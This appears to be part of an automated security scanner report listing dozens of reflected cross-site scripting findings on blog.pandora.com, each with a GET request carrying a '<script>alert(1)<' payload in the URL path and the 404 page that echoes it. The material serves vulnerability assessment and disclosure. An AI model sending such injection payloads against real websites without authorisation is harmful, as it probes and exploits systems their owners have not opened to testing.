Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/04 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb7b3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/04cb7b3<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/04cb7b3<script>alert(1)< ...[SNIP]... |
3.249. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/06 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cc96<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5cc96<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5cc96<script>alert(1)< ...[SNIP]... |
3.250. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/06 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d407f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd407f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd407f<script>alert(1)< ...[SNIP]... |
3.251. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/06 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ff848<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ff848<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ff848<script>alert(1)< ...[SNIP]... |
3.252. http://blog.pandora.com/pandora/archives/2010/06/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/06 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edb24<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/06edb24<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/06edb24<script>alert(1)< ...[SNIP]... |
3.253. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d931d<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorad931d<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorad931d<script>alert(1)< ...[SNIP]... |
3.254. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b9c8<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives1b9c8<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives1b9c8<script>alert(1)< ...[SNIP]... |
3.255. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e09c9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010e09c9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010e09c9<script>alert(1)< ...[SNIP]... |
3.256. http://blog.pandora.com/pandora/archives/2010/08/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b6267<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08b6267<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/08b6267<script>alert(1)< ...[SNIP]... |
3.257. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9c939<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9c939<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:52 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9c939<script>alert(1)< ...[SNIP]... |
3.258. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b40c4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesb40c4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:56 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesb40c4<script>alert(1)< ...[SNIP]... |
3.259. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload aa222<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010aa222<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:00 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010aa222<script>alert(1)< ...[SNIP]... |
3.260. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79622<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0879622<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:05 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0879622<script>alert(1)< ...[SNIP]... |
3.261. http://blog.pandora.com/pandora/archives/2010/08/be-part-of-a-pa.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/08 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 39457<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/08 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/08 ...[SNIP]... |
3.262. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92883<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora92883<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora92883<script>alert(1)< ...[SNIP]... |
3.263. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0526<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesc0526<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:26 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesc0526<script>alert(1)< ...[SNIP]... |
3.264. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68e05<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201068e05<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201068e05<script>alert(1)< ...[SNIP]... |
3.265. http://blog.pandora.com/pandora/archives/2010/09/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42f15<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0942f15<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0942f15<script>alert(1)< ...[SNIP]... |
3.266. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 88323<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora88323<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 367 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora88323<script>alert(1)< ...[SNIP]... |
3.267. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cd772<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescd772<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivescd772<script>alert(1)< ...[SNIP]... |
3.268. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 244d1<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010244d1<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:41 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010244d1<script>alert(1)< ...[SNIP]... |
3.269. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 80718<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/0980718<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:43 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/0980718<script>alert(1)< ...[SNIP]... |
3.270. http://blog.pandora.com/pandora/archives/2010/09/tim-on-cnbc-1.html [REST URL parameter 5] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/09 |
Issue detail
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 7f010<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/09 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/09 ...[SNIP]... |
3.271. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6a980<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora6a980<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora6a980<script>alert(1)< ...[SNIP]... |
3.272. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f9630<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf9630<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf9630<script>alert(1)< ...[SNIP]... |
3.273. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52dc5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201052dc5<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201052dc5<script>alert(1)< ...[SNIP]... |
3.274. http://blog.pandora.com/pandora/archives/2010/10/ [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 46f70<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1046f70<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1046f70<script>alert(1)< ...[SNIP]... |
3.275. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 639cf<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora639cf<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 368 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora639cf<script>alert(1)< ...[SNIP]... |
3.276. http://blog.pandora.com/pandora/archives/2010/10/an-update-on-pa.html [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/2010/10 |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6f725<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives6f725<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
